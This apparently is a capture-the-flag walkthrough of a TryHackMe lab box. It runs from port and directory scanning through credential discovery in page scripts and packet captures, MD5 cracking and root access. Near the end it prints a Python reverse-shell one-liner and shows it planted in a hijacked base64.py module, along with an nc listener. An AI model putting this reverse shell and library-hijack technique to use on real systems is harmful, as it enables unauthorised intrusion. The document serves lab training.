Initial recon
Port scanning
Lets do a ip scan using rustscan This revealed some ports and services
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
rustscan -a 10.10.83.68
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
Open 10.10.83.68:22
Open 10.10.83.68:80
Open 10.10.83.68:37370
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
37370/tcp open unknown syn-ack
Start a directory scan using ffuf
1
ffuf -u "http://10.10.83.68/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let that fuzzing commence and in the meantime, some recon on the ip
check the usual suspects.
- View page source(nothing interesting in these instance)
- checked robots.txt -> not there :(
- Click some buttons to see behavior and what they may reveal- Nothing interesting here too
Subdomain discovery
Back to the scan and something is cooking
1
2
3
/gallery (Status: 301) [Size: 312] [--> http://10.10.83.68/gallery/]
/static (Status: 301) [Size: 311] [--> http://10.10.83.68/static/]
/pricing (Status: 301) [Size: 312] [--> http://10.10.83.68/pricing/]
pricing has a note.txt for us, but nothing of interest
Nothing much.So let’s resume recon Do subdomain scanning
1
ffuf -u "http://10.10.83.68/static/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Vulnerable parameter discovery
We visit static/00 and it reveals hidden instructions valleyDev is instructing that a directory /dev1243224123123 be removed. Lets check it out. visit said directory and we get a login form. view page source and a script is being parsed by the form. Click on the script and we get some information.
1
2
3
4
5
6
if (username === "siemDev" && password === "california") {
window.location.href = "/dev1243224123123/devNotes37370.txt";
} else {
loginErrorMsg.style.opacity = 1;
}
}
At http://10.10.83.68/dev1243224123123/devNotes37370.txt, we see that its just instructions for an ftp server. The credentials are on http://10.10.83.68/dev1243224123123/dev.js directory
FTP access and file discovery
In the terminal let’s access the ftp server
1
2
ftp siemDev@10.10.83.68 37370
We specify port 37370 because we have a clue at devNotes37370.txt -> "37370"
Run ls and we see some files. We can’t do much here so fetch them to local machine
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ftp siemDev@10.10.83.68 37370
Connected to 10.10.83.68.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||16001|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 7272 Mar 06 13:55 siemFTP.pcapng
-rw-rw-r-- 1 1000 1000 1978716 Mar 06 13:55 siemHTTP1.pcapng
-rw-rw-r-- 1 1000 1000 1972448 Mar 06 14:06 siemHTTP2.pcapng
226 Directory send OK.
ftp>mget *.pcapng
Wireshark
These are network packet data. Power up wireshark and open http1.pcapng
1
$ wireshark siemHTTP2.pcapng
filter to get http packects, follow http stream, Someone just gave us username and password.
1
uname=valleyDev&psw=ph0t0s1234&remember=onHTTP/1.1 200 OK
Looks like we can try to access the server (ssh)
1
ssh valleyDev@10.10.83.68
we are in. Do an ls and user.txt file is there.
1
2
valleyDev@valley:~$ cat user.txt
THM{********}
But that is all we can see as this user and with these privileges. Lets find a way to change that :)
Change directory to home directory and check files.
1
2
cd ..
ls -la
Hash capturing
There is an interesting file valleyAuthenticator. fetch it to our local machine using python server on host
1
python3 -m http.server 1234
on local machine -
1
wget http://10.10.83.68:1234/valleyAuthenticator
check character string of the file
1
strings valleyAuthenticator
At the end there is UPX! and what might this mean. UPX (Ultimate Packer for Executables) is a popular open-source executable file compression utility. it is a data compresser we just decompress the file
1
upx -d valleyAuthenticator
Hash cracking
Inspect the strings an we see something interesting. There seems to be a hash in the metadata of the file.
1
2
e6722920bab2326f8217e4bf6b1b58ac
dd2921cc76ee3abfd2beb60709056cfb
Copy it and put in file (hash for my instance) use hash-identifier or online tools to check type of hashing used here.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Not Found.
--------------------------------------------------
HASH: e6722920bab2326f8217e4bf6b1b58ac
dd2921cc76ee3abfd2beb60709056cfb
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Now we identify hash as md5 Let’s crack the hash using John the ripper
1
john hash -w rockyou --format=RAW-MD5
we get credentials valley liberty123 we are sudo but not there yet. We can’t access root files. Find escalation points. get pspy from https://github.com/DominicBreuker/pspy/releases. For mine i use pspy64. Download to you machine. use python server on local machine where you have the downloaded file
1
python -m http.server 1234
on target machine
1
wget http://10.9.5.186/pspy64
Close the connection Modify permissions of the file
1
chmod +x pspy64
Execute it
1
./pspy64
and we see some interesting stuff
Privesc
We see a script that imports a base64 module
1
2
3
4
5
python3 /photos/script/photosEncrypt.py
$ cat /photos/script/photosEncrypt.py
#!/usr/bin/python3
import base64
find base64.py files
1
find / type -name "base64.py" 2>/dev/null
We get something interesting /usr/lib/python3.8/base64.py Let’s modify to get shell
1
nano /usr/lib/python3.8/base64.py
Getting a reverse shell
Go to local machine and listen on the port you chose(i used 1234) Visit revshell.com to get proper command
1
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10..9.5.186",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
Paste in the python file and save.
Reverse shell
1
2
3
4
5
6
7
8
9
10
11
nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.9.5.186] from (UNKNOWN) [10.10.83.68] 48880
# ls
ls
root.txt snap
# cat root.txt
cat root.txt
THM{**********}
#
YOU ARE ROOT!
Answer the Questions!! Happy Hacking…. :)